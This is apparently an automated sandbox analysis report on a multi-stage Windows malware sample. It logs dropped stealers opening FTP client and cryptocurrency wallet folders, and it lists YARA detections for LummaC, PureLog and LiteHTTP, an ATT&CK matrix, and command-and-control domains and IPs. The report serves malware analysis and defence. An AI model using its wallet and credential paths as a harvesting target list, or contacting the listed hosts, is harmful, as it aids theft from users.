                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetter
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Roaming\FTPbox
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfo
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Roaming\FTPRush
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTP
                                Tries to steal Crypto Currency Wallets
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                                Source: QkRFz2sau5.exeBinary or memory string: WIN_81
                                Source: QkRFz2sau5.exeBinary or memory string: WIN_XP
                                Source: QkRFz2sau5.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                                Source: QkRFz2sau5.exeBinary or memory string: WIN_XPe
                                Source: QkRFz2sau5.exeBinary or memory string: WIN_VISTA
                                Source: QkRFz2sau5.exeBinary or memory string: WIN_7
                                Source: QkRFz2sau5.exeBinary or memory string: WIN_8
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIX
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIX
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSO
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSO
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKI
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKI
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeDirectory queried: C:\Users\user\Documents\NHPKIZUUSG
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeDirectory queried: C:\Users\user\Documents\NHPKIZUUSG
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUND
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUND
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEY
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEY
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAH
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAH
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPS
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPS
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeDirectory queried: C:\Users\user\Documents\NHPKIZUUSG
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeDirectory queried: C:\Users\user\Documents\NHPKIZUUSG
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAH
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAH
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAH
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAH
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPU
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIX
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIX
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSO
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSO
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeDirectory queried: C:\Users\user\Documents\NHPKIZUUSG
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeDirectory queried: C:\Users\user\Documents\NHPKIZUUSG
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEY
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEY
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKI
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKI
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeDirectory queried: C:\Users\user\Documents\NHPKIZUUSG
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeDirectory queried: C:\Users\user\Documents\NHPKIZUUSG
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEY
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEY
                                Source: Yara matchFile source: 0000000F.00000003.22391403036.0000000000B39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000F.00000003.22377181188.0000000000B39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000026.00000002.22708013785.0000000001413000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000F.00000003.22377011303.0000000000B8B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: 9c1024a1f1.exe PID: 3092, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: f891ed3167.exe PID: 5544, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: f8e8a2d2f0.exe PID: 2920, type: MEMORYSTR

                                Remote Access Functionality

                                barindex
                                Yara detected LiteHTTP Bot
                                Source: Yara matchFile source: dump.pcap, type: PCAP
                                Yara detected LummaC Stealer
                                Source: Yara matchFile source: Process Memory Space: 9c1024a1f1.exe PID: 3092, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: f891ed3167.exe PID: 5544, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: f8e8a2d2f0.exe PID: 2920, type: MEMORYSTR
                                Source: Yara matchFile source: 35.2.33c3d7c7bd.exe.a320000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 38.2.f891ed3167.exe.400000.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 43.2.f8e8a2d2f0.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 35.2.33c3d7c7bd.exe.a370000.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 35.2.33c3d7c7bd.exe.a370000.3.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 46.0.d9caf9fc21.exe.a00000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 35.2.33c3d7c7bd.exe.a2ba000.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 46.2.d9caf9fc21.exe.a00000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 38.2.f891ed3167.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 43.2.f8e8a2d2f0.exe.400000.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 35.2.33c3d7c7bd.exe.a320000.4.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 35.2.33c3d7c7bd.exe.a2ba000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 42.2.f8e8a2d2f0.exe.4289550.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 15.2.9c1024a1f1.exe.fc0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000023.00000002.22885525568.000000000A2BA000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000024.00000002.22603526519.0000000003E60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002A.00000002.22650688983.0000000004289000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000026.00000002.22706302291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002B.00000002.22744830820.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002E.00000002.23299926904.0000000000B89000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000F.00000002.22450863752.0000000000FC1000.00000040.00000001.01000000.00000012.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000023.00000002.22885525568.000000000A370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000023.00000002.22885525568.000000000A320000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1075002001\d9caf9fc21.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[2].exe, type: DROPPED
                                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                                Yara detected PureLog Stealer
                                Source: Yara matchFile source: 42.2.f8e8a2d2f0.exe.4289550.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 36.2.f891ed3167.exe.3d99550.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 48.2.MSBuild.exe.4078630.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 48.2.MSBuild.exe.69b0000.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 48.2.MSBuild.exe.69b0000.2.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 42.0.f8e8a2d2f0.exe.dd0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 36.2.f891ed3167.exe.3d99550.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 42.2.f8e8a2d2f0.exe.4289550.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 48.2.MSBuild.exe.4078630.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 36.0.f891ed3167.exe.910000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000024.00000000.22557531054.0000000000912000.00000002.00000001.01000000.00000019.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000024.00000002.22603526519.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000030.00000002.23317961529.0000000003C67000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002A.00000002.22650688983.0000000004289000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000030.00000002.23336208269.00000000069B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002A.00000000.22619514498.0000000000DD2000.00000002.00000001.01000000.0000001C.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\random[2].exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe, type: DROPPED
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009E1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_009E1204
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009E1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_009E1806

                                Mitre Att&ck Matrix

                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                Gather Victim Identity Information21
                                Scripting                                		2
                                Valid Accounts                                		121
                                Windows Management Instrumentation                                		21
                                Scripting                                		1
                                Exploitation for Privilege Escalation                                		11
                                Disable or Modify Tools                                		2
                                OS Credential Dumping                                		2
                                System Time Discovery                                		Remote Services11
                                Archive Collected Data                                		14
                                Ingress Tool Transfer                                		Exfiltration Over Other Network Medium1
                                System Shutdown/Reboot
                                CredentialsDomainsDefault Accounts1
                                Native API                                		1
                                DLL Side-Loading                                		1
                                DLL Side-Loading                                		11
                                Deobfuscate/Decode Files or Information                                		21
                                Input Capture                                		1
                                Account Discovery                                		Remote Desktop Protocol41
                                Data from Local System                                		11
                                Encrypted Channel                                		Exfiltration Over BluetoothNetwork Denial of Service
                                Email AddressesDNS ServerDomain Accounts2
                                Command and Scripting Interpreter                                		2
                                Valid Accounts                                		2
                                Valid Accounts                                		131
                                Obfuscated Files or Information                                		Security Account Manager13
                                File and Directory Discovery                                		SMB/Windows Admin Shares1
                                Email Collection                                		1
                                Non-Standard Port                                		Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal Accounts21
                                Scheduled Task/Job                                		21
                                Scheduled Task/Job                                		21
                                Access Token Manipulation                                		22
                                Software Packing                                		NTDS410
                                System Information Discovery                                		Distributed Component Object Model21
                                Input Capture                                		4
                                Non-Application Layer Protocol                                		Traffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud Accounts2
                                PowerShell                                		Network Logon Script212
                                Process Injection                                		1
                                Timestomp                                		LSA Secrets1191
                                Security Software Discovery                                		SSH3
                                Clipboard Data                                		125
                                Application Layer Protocol                                		Scheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts21
                                Scheduled Task/Job                                		1
                                DLL Side-Loading                                		Cached Domain Credentials681
                                Virtualization/Sandbox Evasion                                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items111
                                Masquerading                                		DCSync4
                                Process Discovery                                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                                Valid Accounts                                		Proc Filesystem11
                                Application Window Discovery                                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                                Modify Registry                                		/etc/passwd and /etc/shadow1
                                System Owner/User Discovery                                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron681
                                Virtualization/Sandbox Evasion                                		Network Sniffing1
                                System Network Configuration Discovery                                		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd21
                                Access Token Manipulation                                		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                                Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task212
                                Process Injection                                		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                                Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
                                Mshta                                		GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service

                                Behavior Graph

                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1611846 Sample: QkRFz2sau5.exe Startdate: 11/02/2025 Architecture: WINDOWS Score: 100 107 toppyneedus.biz 2->107 109 suggestyuoz.biz 2->109 111 21 other IPs or domains 2->111 127 Suricata IDS alerts for network traffic 2->127 129 Found malware configuration 2->129 131 Malicious sample detected (through community Yara rule) 2->131 133 35 other signatures 2->133 11 skotes.exe 57 2->11         started        16 QkRFz2sau5.exe 1 2->16         started        18 skotes.exe 2->18         started        20 2 other processes 2->20 signatures3 process4 dnsIp5 115 185.215.113.43, 49756, 49757, 49760 WHOLESALECONNECTIONSNL Portugal 11->115 117 185.215.113.75, 49758, 49762, 49767 WHOLESALECONNECTIONSNL Portugal 11->117 91 C:\Users\user\AppData\...\c7f37422c5.exe, PE32 11->91 dropped 93 C:\Users\user\AppData\...\d9caf9fc21.exe, PE32 11->93 dropped 95 C:\Users\user\AppData\...\f8e8a2d2f0.exe, PE32 11->95 dropped 99 13 other malicious files 11->99 dropped 183 Hides threads from debuggers 11->183 185 Tries to detect sandboxes / dynamic malware analysis system (registry check) 11->185 187 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 11->187 22 9c1024a1f1.exe 11->22         started        26 7ecb69d7f1.exe 11->26         started        28 f8e8a2d2f0.exe 11->28         started        38 5 other processes 11->38 97 C:\Users\user\AppData\Local\...\CB6Ixkrbm.hta, HTML 16->97 dropped 189 Binary is likely a compiled AutoIt script file 16->189 191 Found API chain indicative of sandbox detection 16->191 193 Creates HTA files 16->193 30 mshta.exe 19 16->30         started        32 cmd.exe 1 16->32         started        195 Suspicious powershell command line found 20->195 197 Tries to download and execute files (via powershell) 20->197 199 Windows Scripting host queries suspicious COM object (likely to drop second stage) 20->199 34 AchillesGuard.com 20->34         started        36 powershell.exe 16 20->36         started        file6 signatures7 process8 dnsIp9 113 rebeldettern.com 172.67.150.254, 443, 49759, 49761 CLOUDFLARENETUS United States 22->113 135 Antivirus detection for dropped file 22->135 137 Detected unpacking (changes PE section rights) 22->137 139 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 22->139 157 4 other signatures 22->157 141 Multi AV Scanner detection for dropped file 26->141 40 cmd.exe 26->40         started        143 Machine Learning detection for dropped file 28->143 145 Injects a PE file into a foreign processes 28->145 43 f8e8a2d2f0.exe 28->43         started        47 WerFault.exe 28->47         started        147 Suspicious powershell command line found 30->147 149 Tries to download and execute files (via powershell) 30->149 49 powershell.exe 15 19 30->49         started        151 Drops PE files with a suspicious file extension 32->151 153 Uses schtasks.exe or at.exe to add and modify task schedules 32->153 57 2 other processes 32->57 51 MSBuild.exe 34->51         started        53 conhost.exe 36->53         started        155 Tries to detect sandboxes and other dynamic analysis tools (window names) 38->155 159 2 other signatures 38->159 55 f891ed3167.exe 38->55         started        59 2 other processes 38->59 signatures10 process11 dnsIp12 87 C:\Users\user\AppData\...\Macromedia.com, PE32 40->87 dropped 61 Macromedia.com 40->61         started        65 conhost.exe 40->65         started        67 tasklist.exe 40->67         started        73 9 other processes 40->73 119 paleboreei.biz 172.67.181.243 